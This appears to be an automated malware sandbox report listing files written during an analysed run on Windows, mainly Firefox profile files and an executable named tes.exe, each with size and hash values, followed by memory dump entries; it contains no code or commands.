C:\Users\Admin\AppData\Local\Temp\tmpaddon

Filesize
479KB

MD5
09372174e83dbbf696ee732fd2e875bb

SHA1
ba360186ba650a769f9303f48b7200fb5eaccee1

SHA256
c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f

SHA512
b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

Filesize
13.8MB

MD5
0a8747a2ac9ac08ae9508f36c6d75692

SHA1
b287a96fd6cc12433adb42193dfe06111c38eaf0

SHA256
32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03

SHA512
59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OSK7P09XOACGIVBNLFYA.temp

Filesize
19KB

MD5
38abc5056cd182de3644ec079aaa1c7d

SHA1
f8a17fad071c554a84506ef240c4e5ed71d729a4

SHA256
7d086742248a1d23775fccb26dc2e0939420e2c6c56ac7bf385da344d883a0c8

SHA512
13a13d30c6bb3f3ca110fac7d1d1b89c7b6fc3740361774f8b5f0d4f6a1b627f77ffd81579c0a64ddd8d32a2ec23f342268731c2557fc631ba7f2aa181dd9487

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\AlternateServices.bin

Filesize
7KB

MD5
526c11336a5544c300a572ee16516e95

SHA1
4e6c7deef97f96f22db826cb9561d865e60d8c2f

SHA256
04c86fdb817da6f8822e4e7c5d673545d037b42b2a55cb86f88b7cdcacc6e0b0

SHA512
291e96f7daaeae03fab20ce00a174c7c82f3d948a966f196c4c661e2f738658eb45e2493c77ea254090d46379b9c0958b5b9b1a4b46a5f51a2dd4cfcd42dc624

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\AlternateServices.bin

Filesize
18KB

MD5
d86e1972d9bbb11339b21b7073a663e8

SHA1
976a9ebabda31bc0cfe39fa247de0cf87e6d3980

SHA256
3043e3a6e43379b1fd637bb0135ea3a26ca3d90578df18feb36e0cb4a319ee10

SHA512
90af04089409699eef2383e7ff19a6eaa05f4ea93e477f120b04e1a3826a9af54af4c12d8a2b40dbebcab70e207653d8820542883b98ae46022989f29121d696

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\bookmarkbackups\bookmarks-2025-03-03_11_AfFL7eBmHAIRJezKfI1OBA==.jsonlz4

Filesize
1007B

MD5
537e6504cc98c06d919ffe40fe7b8994

SHA1
b0f5ae9389099a52cb0101cb759e13a04256d45c

SHA256
e1ae3f516be61978d681ae29d27f8c593bef67d40abb274b4fa85cb27c28cda0

SHA512
49ef1106bd21b64393a9ba9f7f4d0e5da82ad8ead05534b811f4428b3538c755cb6b0340c6888471eb37e875aee7a9926f410cd07c7883f16cc3f4cf1dab269e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\datareporting\glean\db\data.safe.tmp

Filesize
5KB

MD5
d1b594f9f02165b5c854b7e1b95513e7

SHA1
f34040bd5b57d57627a109cfc62b59a26033c3ac

SHA256
ce3e67206c958bf0c71f95f24e6a1c04b7727ec4f171d2f64473768753c41088

SHA512
24509d1580578ec34393aa24ccf6d6020ba1c9d7c26dd14bfc28d7f767c62f27b8c51380cf0ccf10a86f197365d51e00df388f03a888d67105e6259d92b2a7dd

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\datareporting\glean\db\data.safe.tmp

Filesize
80KB

MD5
a8bb180388aea43fa7727c39579b5302

SHA1
47bd9513a15097548f2509581fb1596ab88b6b14

SHA256
fe72cea4e310677aa1d95d081ed6a3813f8abd58d4e2d60d27f645c44d473744

SHA512
22e5d7514b652309d9ccfcbb0f9e2a9be9cfe4a2a3d1277424a8901666a11c33a543ba012a9d7c7825ba2a82cbd0c66b86a83e2e5900a129c37adb4d1e04af4b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\datareporting\glean\db\data.safe.tmp

Filesize
6KB

MD5
1de549eedcd6e23400861a2c4d0965bf

SHA1
7191f0639b506ca6e1ce506e66c3efec0ec5a819

SHA256
05dfb9d0913ed2812e38270c0b48c09a0d0a7e95f2e58598ef5be4b681b70af7

SHA512
6929fe8749eeb18a8ec7098c6c122b484d90c0a95bd385945b0faf606c30c023f8622f55c6aaf1c3c66a6972d305caf3ea1c85adc538d54cbba9bdb55b7dbd48

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\datareporting\glean\db\data.safe.tmp

Filesize
79KB

MD5
08e2c8a4ed485837c820a424136666e9

SHA1
8df30b6ea70a00e4b5131ccf94aa2b565b32c463

SHA256
fef652ace2f994e3802eb95ebb75171bf0e4b3d07bf92ff6b31cdfd2b6846b18

SHA512
cacc733e32a06f3a3241babcc8c4af628a55587f0a56af89b65edb4703e0275a46e31653395cc517b9428f99f41d0993f071163fedcccb346c633bb4a1648be2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\datareporting\glean\pending_pings\01819032-e5ff-44ce-8631-ed73799b2782

Filesize
26KB

MD5
885929495fd435bb314dc31ccb092c2a

SHA1
07b304ea0b48f1470d9605db340078c7111489ff

SHA256
c28f5d7c1cbb72b3c9f55de6c9ed2d9ecb334e80bc00fe0dedf30426afe8c6a7

SHA512
b2504cb14f3a327d97c038dd50904e2a059115b1179308fc1eab68523d074b69967b7dad04f525bcc422d894a4a87f865d3925f0a5f2b91930ecc3e196738b52

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\datareporting\glean\pending_pings\24e363fd-a894-4e6a-8ae1-03ce951b0fef

Filesize
982B

MD5
34881f75cb375b4b0c7b3063c3996f11

SHA1
62bfb65c2377d0ada5306f5087bfd18f83069d29

SHA256
0b1d17feba92891312924bbe785f01af022d1356060546f73bf2d3aed4647f3d

SHA512
1a00b71b41b6965015b9991e47fd572f0dc13bfc48626f3a41cd4329fd3db2bc0a35178a0befb0a9209c0a357d522a28873839c2ffb8d1e5bacab8a99f0dd964

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\datareporting\glean\pending_pings\7ce8028d-ada9-4ade-9f84-b56e0c4dcbea

Filesize
671B

MD5
dc1039a9d74bd264c6db8451274983bf

SHA1
3423e4b7a807885f95975a4ff3d0e54ab371023e

SHA256
0d759ab3d9c2cc869e2e1e300ad016611b5e080c9666b20491f04442826bccea

SHA512
cfb84e963a59bb8817eec4496033a77b0450d5a995ad5a215e1bea6e52cd9812328616382308eb789c28e29b4ae8121cceb1cdf986c822edd5d32f0251863cbf

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

Filesize
1.1MB

MD5
842039753bf41fa5e11b3a1383061a87

SHA1
3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153

SHA256
d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

SHA512
d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

Filesize
116B

MD5
2a461e9eb87fd1955cea740a3444ee7a

SHA1
b10755914c713f5a4677494dbe8a686ed458c3c5

SHA256
4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

SHA512
34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

Filesize
372B

MD5
bf957ad58b55f64219ab3f793e374316

SHA1
a11adc9d7f2c28e04d9b35e23b7616d0527118a1

SHA256
bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

SHA512
79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

Filesize
17.8MB

MD5
daf7ef3acccab478aaa7d6dc1c60f865

SHA1
f8246162b97ce4a945feced27b6ea114366ff2ad

SHA256
bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

SHA512
5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\prefs-1.js

Filesize
9KB

MD5
bc32554d5bebb28597e3c6d3ea00a811

SHA1
9443fbe1739d131043da265a9cce5045552ffbc0

SHA256
dbfd6cfeb763cfd5a58f82ca165f8b3c0be5ba71e9b74afe826860648657b552

SHA512
8a1fa6e8fcfa741fcd173963361d980ea8b54405a108cdc2181a53b481317a44a30c06cee3b8fd9082f13f96bd95303100600b601bd841733ea70eea4b49c2c0

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\prefs-1.js

Filesize
11KB

MD5
a50dee1f03750348e5003c4019f16018

SHA1
3abc04958f8685aa785bf52e6993ec947280dc52

SHA256
5c1989d60bc33ca21244243fe4baf3745d7fc91873c16177c5bd00da70567433

SHA512
5398d7739296d084b80141db859b5ce77b2530a17522e80ae4c9374b45f16659006b4845f012457c3700ad5efc5e42315327d136a4670274f9bdf716cfafb10a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\prefs-1.js

Filesize
10KB

MD5
d52ba12ffbb1dc67dc5a7e45bbb4bbfd

SHA1
36e69648ee3b08797370b6ab0b332d10fec5f1b7

SHA256
de792396805b972f3506883d1c22ca454dc189461b03a75a20c980c2ed03329a

SHA512
9178f608940db45d4cf518776138f8df708eb99c0f7c49586529e0d359ce5d63472e32b29313a6b17774c07e6d1515402afa13e2c83096fe0eb504678c321e07

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\prefs.js

Filesize
10KB

MD5
c27eef71db427fecd1436c8894b09356

SHA1
f5ffcf356445c013e653649a9b38dd8499aa26bf

SHA256
f65419ccee270cfa53f45aab9fcf4aa676a2b781e6b87e1f8c5394dcb4d98683

SHA512
2477af8ec4a1f2b283376b1b77cca574c124f71977eb196f80fc5ce6f7fe8aebead61f340a4942668176fd62f0a8ed566d14dc3f4d42b0d39e76da60db0f48ea

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\prefs.js

Filesize
11KB

MD5
e898edd3f5fa4a400e477f02c2b5a31d

SHA1
4b7edfeb926e08ab9f153fc0765429b644fbd647

SHA256
6b70c3113a982706ae907252d758b8345b0f13f993c482e37d0c93f90a43d6c2

SHA512
4227e5d532ccaf3940fa12a18bad4c3f536f8c8be762956db427e9eaf45540933296fef676c95001e42c3d658ae7d969972e0a2365c862bcfebc33dbf0429f7f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\prefs.js

Filesize
9KB

MD5
5856a0ad0c837f4330892cdce393cfe8

SHA1
3d5aee54ed1e9d5240b581423a8a2930a06089b5

SHA256
2fc6fc6cef2219b509807a1a75dfac9b4b0ff68852b8b3374c037fd53157dbeb

SHA512
19d47584ca0260f9688a07c66dcb64878fbd2707e4b491ae3e969f79704538dd6b2c6463ff128f46af95f37d848522223413d6a8c551d58e069392dbae711e3c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\sessionstore-backups\recovery.baklz4

Filesize
1KB

MD5
bb0441106dd38bc48121bf55df7af28d

SHA1
634a918fe3c9ab40f0c70c3d44c8701584763271

SHA256
d4d577805d952c8b12521e8ac4f4c9d8c68a0029ef851dca437b2ea7d918c8e1

SHA512
cb2d8d99035dfc487e7d422ebf9ff2577bc762a7e2100bc26d9a21851c1cf7c1fcef3288073b55e416a785b9d4733db01fa6837c8fcade3ce7ab2a6f857cb149

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\sessionstore-backups\recovery.baklz4

Filesize
7KB

MD5
2efa87e7434f646e36ba1461c947ac61

SHA1
c290a3c503fbd028036e148a411160f1db4e9f82

SHA256
1d28e10865a581f9f7a8a19c24cbaaf3582cf7f0be7a6ca8c8cc214215339e77

SHA512
636d508c25d9f3ec91eebc38c1e4985593b67a487ddcf784ba7a5ec6d3c07810785bf1bd84cef1a89df2fe98638681df96efb9bdfedb7c171a919e3164ed52de

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\sessionstore-backups\recovery.baklz4

Filesize
4KB

MD5
7004f148e0c8b96743cbad87e8f5e3cc

SHA1
515189518a505ef628591a84d46a302c1607dd64

SHA256
250ab30d6d09cd8abad160e43b2035b2bbe16f486e637f7caccde02ff7824f90

SHA512
94d7c3a2aacdb925212c5f556cfc0e5c490adc3d96fdb0e15280ed5b180d8b6f49ddbca2713b7f9740ca554b34d3582b37a100e3c49e07c0e4611f226184fce8

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\sessionstore-backups\recovery.baklz4

Filesize
6KB

MD5
0f098760d4091e3859ba2a655dc78cc8

SHA1
6fd365c0c5c0402ae25b8c50d732881b1eee5c13

SHA256
f40ebb21c531b2b6b567ab0151f4398e092d1f55fa1af2c43e1b1859968b9ce9

SHA512
efce0353d1e39e3ab60dbb3d1d03e2e1b695f0fe953d048ef234dbc264f4a199b0f37632a8d67ad4845054bd554f1901e2e3aff0642632e07c46f16f17f64b4f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

Filesize
664KB

MD5
cdd99f17beb84b47bf2400f5255c2ede

SHA1
8433883e509d1130078a4f37ff657a6e8451b480

SHA256
726c0ee91d25ba955c0a61cb3eaa4265b2e18f1b044a76334a7766942bbd8aeb

SHA512
b9be9d1ffd4320d5680fa6f4cc45cfb55d06e40d8756f89bef72999a7708e8ec706124cab9644d7052df63fd33aef45356537a5357f020325dd698f687cb4f27

Download Submit
C:\Windows\System32\tes.exe

Filesize
32KB

MD5
4fc044304cc6300f4c616587d81b0244

SHA1
2497c2a35feba85a5e7500e86f24d78b959b31b0

SHA256
882693e145705dcc3ecc52d5fd5187cdf3ae6da1c67af12e229746b0d64e9454

SHA512
d5298d83decffcca0f188b8c1a186ecbc85a8427da7feb618b403d24bb7ad05727068ed841f83bc3f1cda1cf8a56ed4fa3733e6c4731623c2e6e36675d4aa40e

Download Submit
memory/3252-1016-0x0000000000CC0000-0x0000000000CCC000-memory.dmp

Filesize
48KB

Download
memory/3252-20-0x0000000000420000-0x000000000042E000-memory.dmp

Filesize
56KB

Download
memory/3252-961-0x0000000000BF0000-0x0000000000BFC000-memory.dmp

Filesize
48KB

Download
memory/3252-1017-0x000000001DBB0000-0x000000001E0D8000-memory.dmp

Filesize
5.2MB

Download
memory/3328-0-0x00007FFC438F3000-0x00007FFC438F5000-memory.dmp

Filesize
8KB

Download
memory/3328-11-0x00007FFC438F0000-0x00007FFC443B1000-memory.dmp

Filesize
10.8MB

Download
memory/3328-12-0x00007FFC438F0000-0x00007FFC443B1000-memory.dmp

Filesize
10.8MB

Download
memory/3328-16-0x00007FFC438F0000-0x00007FFC443B1000-memory.dmp

Filesize
10.8MB

Download
memory/3328-6-0x0000022FDF590000-0x0000022FDF5B2000-memory.dmp

Filesize
136KB

Download